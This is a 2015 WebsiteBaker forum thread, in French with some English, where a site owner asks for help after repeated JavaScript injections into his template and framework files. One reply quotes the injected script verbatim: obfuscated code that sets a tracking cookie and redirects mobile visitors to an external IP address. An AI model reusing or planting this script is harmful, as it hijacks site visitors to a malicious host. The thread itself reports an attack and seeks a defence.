Author Topic: Problème sécurité  (Read 2815 times)

Offline wiby35

  • Posts: 7
Problème sécurité
« on: April 09, 2015, 07:11:15 PM »
Bonjour, j'utilise la dernière version de WebsiteBaker et tout fonctionnais bien jusqu'à il y à quelques jours...

en effet je ne sait pas comment mais une personne (ou un robot) arrive à écrire du javascript juste après la balise body de ma page index de ma template Allcss et réussi à modifier un des fichiers se trouvant dans le dossier "framework"
résultat page blanche et aucun code source...

je supprime donc le javascript juste après la balise <body> et remplace tout le contenu du dossier "framework" et tout rentre dans l'ordre, le contenu s'affiche à nouveau bref tout marche...

comment faire pour résoudre ce problème car je doit faire cette manip tous les 3 jours...

merci de votre aide
p.s fait t'il modifier le chmod ?
chmod dossier framework = 705
chmod dossier Allcss = 705
index.php dans mon dossier template/Allcss/ = 604

Offline wiby35

  • Posts: 7
Re: Problème sécurité
« Reply #1 on: April 09, 2015, 08:24:07 PM »
Bonjour, j'utilise la dernière version de WebsiteBaker et tout fonctionnais bien jusqu'à il y à quelques jours...

en effet je ne sait pas comment mais une personne (ou un robot) arrive à écrire du javascript juste après la balise body de ma page index de ma template Allcss et réussi à modifier un des fichiers se trouvant dans le dossier "framework"
résultat page blanche et aucun code source...

je supprime donc le javascript juste après la balise <body> et remplace tout le contenu du dossier "framework" et tout rentre dans l'ordre, le contenu s'affiche à nouveau bref tout marche...

comment faire pour résoudre ce problème car je doit faire cette manip tous les 3 jours...

merci de votre aide
p.s fait t'il modifier le chmod ?
chmod dossier framework = 705
chmod dossier Allcss = 705
index.php dans mon dossier template/Allcss/ = 604

voilà le code qui s'ajoute automatiquement et sans arerts...

<script type='text/javascript'>var __ae84=["getTime","setTime","expires=","toUTCString","cookie","=","; ",";","split","length","substring","charAt"," ","indexOf","_gax","referrer","http",":","//","146.185.239.3","/sTDS","/go",".p","hp?si","d=","&sr","ef=","userAgent","test","substr","location"];function setCookie(e,h,k){var j= new Date();j[__ae84[1]](j[__ae84[0]]()+(k*1*60*60*1000));var l=__ae84[2]+j[__ae84[3]]();document[__ae84[4]]=e+__ae84[5]+h+__ae84[6]+l;}function getCookie(e){var g=e+__ae84[5];var d=document[__ae84[4]][__ae84[8]](__ae84[7]);for(var f=0;f<d[__ae84[9]];f++){var b=d[f];while(b[__ae84[11]](0)==__ae84[12]){b=b[__ae84[10]](1)};if(b[__ae84[13]](g)==0){return b[__ae84[10]](g[__ae84[9]],b[__ae84[9]])};};return 0;}c=getCookie(__ae84[14]);if(c<2){setCookie(__ae84[14],parseInt(c)+1,1/12);sid=2;var r=document[__ae84[15]];loc=__ae84[16]+__ae84[17]+__ae84[18]+__ae84[19]+__ae84[20]+__ae84[21]+__ae84[22]+__ae84[23]+__ae84[24]+sid+__ae84[25]+__ae84[26]+r;var a=navigator[__ae84[27]];if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[__ae84[28]](a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[__ae84[28]](a[__ae84[29]](0,4))){window[__ae84[30]]=loc};}else {if(c==2){setCookie(__ae84[14],2,24)}};</script>

Offline crnogorac081

  • Posts: 1895
  • Gender: Male
Re: Problème sécurité
« Reply #2 on: April 09, 2015, 08:37:22 PM »
Hi wiby35,

sorry for english here.

It is mostly  problem with your host provider. You must contact them, I think someone is exploiting group permissions over files.

best regards.
no bb in signature

Offline wiby35

  • Posts: 7
Re: Problème sécurité
« Reply #3 on: April 09, 2015, 08:40:18 PM »
Ok thank you Crnogorac 081, I'll see directly with ovh then.
thank you very much (google translation;-)

Offline Martin Hecht

  • Betatester
  • **
  • Posts: 581
  • Gender: Male
    • meine Homepage
Re: Problème sécurité
« Reply #4 on: April 10, 2015, 07:46:34 AM »
c'est probablement le meme problème ici:
http://forum.WebsiteBaker.org/index.php/topic,28219.0/topicseen.html
peut-être les comments là sont utiles

 

postern-length